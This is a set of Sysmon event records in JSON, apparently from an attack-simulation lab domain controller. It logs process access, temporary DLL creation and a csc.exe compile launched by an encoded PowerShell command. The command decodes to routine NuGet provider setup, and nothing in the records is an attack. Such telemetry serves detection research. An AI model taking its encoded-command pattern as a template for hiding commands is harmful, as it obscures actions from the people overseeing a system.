{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4860,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.911\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.911","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4861,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.911\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C1-5F25-0000-001013AF0600}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.911","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C1-5F25-0000-001013AF0600}","TargetProcessId":"3012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4862,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:54:58.286\r\nProcessGuid: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nProcessId: 3216\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\jdhvqrm5\\jdhvqrm5.dll\r\nCreationUtcTime: 2020-08-01 06:54:58.286","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:54:58.286","ProcessGuid":"{E2A3D6B1-11C1-5F25-0000-001069990600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\jdhvqrm5\\jdhvqrm5.dll","CreationUtcTime":"2020-08-01 06:54:58.286","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4863,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.286\r\nProcessGuid: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nProcessId: 3216\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\jdhvqrm5\\jdhvqrm5.cmdline\r\nCreationUtcTime: 2020-08-01 06:54:58.286","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.286","ProcessGuid":"{E2A3D6B1-11C1-5F25-0000-001069990600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\jdhvqrm5\\jdhvqrm5.cmdline","CreationUtcTime":"2020-08-01 06:54:58.286","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4864,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.297\r\nProcessGuid: {E2A3D6B1-11C2-5F25-0000-0010E7BB0600}\r\nProcessId: 4416\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\jdhvqrm5\\jdhvqrm5.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11BF-5F25-0000-0020E96E0600}\r\nLogonId: 0x66EE9\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {E2A3D6B1-11C1-5F25-0000-001069990600}\r\nParentProcessId: 3216\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyAAoASQBuAHMAdABhAGwAbAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByACAALQBOAGEAbQBlACAATgB1AEcAZQB0ACAALQBNAGkAbgBpAG0AdQBtAFYAZQByAHMAaQBvAG4AIAAyAC4AOAAuADUALgAyADAAMQAgAC0ARgBvAHIAYwBlAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.297","ProcessGuid":"{E2A3D6B1-11C2-5F25-0000-0010E7BB0600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\jdhvqrm5\\jdhvqrm5.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11BF-5F25-0000-0020E96E0600}","LogonId":"0x66ee9","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{E2A3D6B1-11C1-5F25-0000-001069990600}","ParentProcessId":"3216","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsACAAPQAgAFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyAAoASQBuAHMAdABhAGwAbAAtAFAAYQBjAGsAYQBnAGUAUAByAG8AdgBpAGQAZQByACAALQBOAGEAbQBlACAATgB1AEcAZQB0ACAALQBNAGkAbgBpAG0AdQBtAFYAZQByAHMAaQBvAG4AIAAyAC4AOAAuADUALgAyADAAMQAgAC0ARgBvAHIAYwBlAA==","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4865,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4866,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4867,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4868,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:58.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:58.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
